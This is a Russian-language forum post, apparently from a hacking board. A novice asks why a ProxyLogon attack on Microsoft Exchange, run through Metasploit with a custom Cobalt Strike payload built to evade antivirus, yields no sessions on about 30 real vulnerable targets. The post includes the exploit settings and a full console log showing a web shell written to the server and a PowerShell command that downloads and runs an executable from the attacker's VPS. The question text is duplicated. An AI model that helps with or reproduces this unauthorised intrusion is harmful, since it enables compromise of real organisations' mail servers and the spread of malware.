Приветствую, заранее скажу, что новичек и только учусь.
В общем проблема, эксплуатирую proxylogon с кастомной нагрузкой кобальта в 2/26 детекта с помощью метасплойта.
Есть таргет, вбиваю настройки (все стандарт, кроме UseAlternatePath=true, set target=1 (windows dropper)), ставлю пэйлоад custom/generic и запускаю сплойт. Итог:
И так я попытался около 30 таргетов, которые реально уязвимые, я не могу поверить, что АВ убивает кобальт с 2/26, даже если в рантайме палится, то сессия приходит в тимсервер, а потом уже ав убивает, но мне не пришла ни одна
Может быть проблема в самом эксплойте?
Вероятно я не понимаю, как надо доставлять кастом нагрузку, буду благодарен за любой ответ и помощь.
В общем проблема, эксплуатирую proxylogon с кастомной нагрузкой кобальта в 2/26 детекта с помощью метасплойта.
Есть таргет, вбиваю настройки (все стандарт, кроме UseAlternatePath=true, set target=1 (windows dropper)), ставлю пэйлоад custom/generic и запускаю сплойт. Итог:
Код:
[*] Executing automatic check (disable AutoCheck to override)
[*] Using auxiliary/scanner/http/exchange_proxylogon as check
[+] https://[target]:443 - The target is vulnerable to CVE-2021-26855.
[*] Scanned 1 of 1 hosts (100% complete)
[+] The target is vulnerable.
[*] https://[target]:443 - Attempt to exploit for CVE-2021-26855
[*] https://[target]:443 - Retrieving backend FQDN over RPC request
[*] Internal server name ([exchange name])
[*] https://[target]:443 - Sending autodiscover request
[*] Server: [server]
[*] LegacyDN: [info legacy dn]
[*] https://[target]:443 - Sending mapi request
[*] SID: [sid] ([mail])
[*] https://[target]:443 - Sending ProxyLogon request
[*] Try to get a good msExchCanary (by patching user SID method)
[*] ASP.NET_SessionId: [session-id]
[*] msExchEcpCanary: [canary] .
[*] OAB id: [oab] (OAB (Default Web Site))
[*] https://[target]:443 - Attempt to exploit for CVE-2021-27065
[*] Preparing the payload on the remote target
[*] Writing the payload on the remote target
[!] Waiting for the payload to be available
[+] Yeeting generic/custom payload at [target]:443
[*] Using URL: http://0.0.0.0:8080/asd
[*] Local IP: http://[my-vps-ip]:8080/asd
[*] (И лишь изредка была такая строчка. команда работает, тестил у себя) Generated payload: powershell.exe -invokerequest http://[my-vps-ip]:8080/asd %temp%\asd.exe .......
[*] Server stopped.
[!] This exploit may require manual cleanup of 'C:\inetpub\wwwroot\aspnet_client\test.aspx' on the target
[*] Exploit completed, but no session was created.И так я попытался около 30 таргетов, которые реально уязвимые, я не могу поверить, что АВ убивает кобальт с 2/26, даже если в рантайме палится, то сессия приходит в тимсервер, а потом уже ав убивает, но мне не пришла ни одна
Может быть проблема в самом эксплойте?
Вероятно я не понимаю, как надо доставлять кастом нагрузку, буду благодарен за любой ответ и помощь.